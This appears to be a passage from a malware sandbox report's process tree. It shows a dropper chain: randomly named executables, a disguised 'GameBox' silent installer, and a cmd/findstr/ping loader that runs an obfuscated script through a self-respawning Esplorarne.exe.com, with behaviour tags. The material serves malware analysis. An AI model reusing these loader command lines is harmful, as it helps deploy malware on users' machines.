C:\Users\Admin\AppData\Roaming\5229276.exe"C:\Users\Admin\AppData\Roaming\5229276.exe"5⤵PID:1972
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1972 -s 23526⤵
- Program crash
PID:4892
-
-
-
C:\Users\Admin\AppData\Roaming\5543575.exe"C:\Users\Admin\AppData\Roaming\5543575.exe"5⤵
- Suspicious behavior: SetClipboardViewer
PID:1176
-
-
C:\Users\Admin\AppData\Roaming\4514171.exe"C:\Users\Admin\AppData\Roaming\4514171.exe"5⤵PID:5424
-
-
C:\Users\Admin\AppData\Roaming\5352217.exe"C:\Users\Admin\AppData\Roaming\5352217.exe"5⤵PID:2044
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 24326⤵
- Program crash
PID:6620
-
-
-
-
C:\Users\Admin\Documents\6PRwkWA6fj0EmlRQBsY77heO.exe"C:\Users\Admin\Documents\6PRwkWA6fj0EmlRQBsY77heO.exe"4⤵PID:5104
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5104 -s 2365⤵
- Program crash
PID:6984
-
-
-
C:\Users\Admin\Documents\BhvyTnFna9qaOfqh1GqXz9JM.exe"C:\Users\Admin\Documents\BhvyTnFna9qaOfqh1GqXz9JM.exe"4⤵PID:3156
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 3165⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2808
-
-
-
C:\Users\Admin\Documents\g90uxw8hJrh44TxICMxWT8tQ.exe"C:\Users\Admin\Documents\g90uxw8hJrh44TxICMxWT8tQ.exe"4⤵PID:6860
-
C:\Users\Admin\AppData\Local\Temp\is-3J0GG.tmp\g90uxw8hJrh44TxICMxWT8tQ.tmp"C:\Users\Admin\AppData\Local\Temp\is-3J0GG.tmp\g90uxw8hJrh44TxICMxWT8tQ.tmp" /SL5="$2047E,138429,56832,C:\Users\Admin\Documents\g90uxw8hJrh44TxICMxWT8tQ.exe"5⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:7088 -
C:\Users\Admin\AppData\Local\Temp\is-TGJVA.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-TGJVA.tmp\Setup.exe" /Verysilent6⤵PID:3560
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"7⤵PID:6604
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629318062 /qn CAMPAIGN=""710"" " CAMPAIGN="710"8⤵PID:3968
-
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"3⤵
- Executes dropped EXE
PID:5676 -
C:\Users\Admin\AppData\Local\Temp\tmp52A5_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp52A5_tmp.exe"4⤵PID:6484
-
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"5⤵PID:4600
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks5⤵PID:6296
-
C:\Windows\SysWOW64\cmd.execmd6⤵PID:5856
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks7⤵PID:824
-
-
C:\Windows\SysWOW64\PING.EXEping YJTUIPJF -n 307⤵
- Runs ping.exe
PID:6924
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comEsplorarne.exe.com i7⤵PID:7128
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i8⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6312 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i9⤵PID:6104
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i10⤵PID:4796
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i11⤵PID:6252
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i12⤵PID:6024
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i13⤵PID:7136
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i14⤵PID:5468
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i15⤵PID:5752
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i16⤵PID:5076
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i17⤵PID:6668
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i18⤵PID:5884
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i19⤵PID:2852
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i20⤵PID:6544
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i21⤵PID:3956
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i22⤵PID:1692
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i23⤵PID:4440
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i24⤵PID:2796
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i25⤵PID:1560
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i26⤵PID:6712
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i27⤵PID:4424
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i28⤵PID:6480
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i29⤵PID:1096
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i30⤵PID:6400
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i31⤵PID:6396
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i32⤵PID:5884
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i33⤵PID:1388
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i34⤵PID:2528
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i35⤵PID:1620
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i36⤵PID:6384
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i37⤵PID:2252
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i38⤵PID:4272
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i39⤵PID:4716
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i40⤵PID:6324
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i41⤵PID:6912
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i42⤵PID:3012
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i43⤵PID:2124
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i44⤵PID:4224
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i45⤵
- Suspicious use of AdjustPrivilegeToken
PID:4616 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i46⤵PID:440
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i47⤵PID:5912
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i48⤵PID:1988
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i49⤵PID:6944
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i50⤵PID:1940
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i51⤵PID:3552
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i52⤵PID:4220
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i53⤵PID:5080
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i54⤵PID:6560
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i55⤵PID:6380
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i56⤵PID:5092
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i57⤵PID:2868
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i58⤵PID:5896
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i59⤵PID:2876
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i60⤵PID:4024
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i61⤵PID:1080
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i62⤵PID:6704
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i63⤵PID:1408
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i64⤵PID:5912
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i65⤵PID:728
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i66⤵PID:2088
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i67⤵PID:5892
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i68⤵PID:1388
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i69⤵PID:420
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i70⤵PID:6468
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i71⤵PID:1400
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i72⤵PID:5208
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i73⤵PID:1984
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i74⤵PID:6796
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i75⤵PID:1004
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i76⤵PID:6424
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i77⤵PID:1440
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i78⤵PID:6972
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i79⤵PID:796
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i80⤵PID:4676
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i81⤵PID:6092
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i82⤵PID:1960
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i83⤵PID:5380
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i84⤵PID:3076
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i85⤵PID:6080
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i86⤵PID:5920
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i87⤵PID:6888
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i88⤵PID:4068
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i89⤵PID:4016
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i90⤵PID:2944
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i91⤵
- Suspicious use of AdjustPrivilegeToken
PID:2352 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i92⤵PID:6788
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i93⤵PID:6576
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i94⤵PID:1228
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i95⤵PID:2276
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i96⤵PID:4208
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i97⤵PID:6736
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i98⤵PID:6648
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i99⤵PID:3088
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i100⤵PID:1528
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i101⤵PID:2500
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i102⤵PID:1280
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i103⤵PID:4440
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i104⤵PID:5144
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i105⤵PID:4840
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i106⤵PID:1664
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i107⤵PID:4084
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i108⤵PID:6600
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i109⤵PID:1092
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i110⤵PID:5100
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i111⤵PID:2908
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i112⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4244 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i113⤵PID:6752
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i114⤵PID:2516
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i115⤵PID:2500
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i116⤵PID:2800
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i117⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6952 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i118⤵PID:1704
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i119⤵PID:2544
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i120⤵PID:6968
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i121⤵PID:4204
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i122⤵PID:1612
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-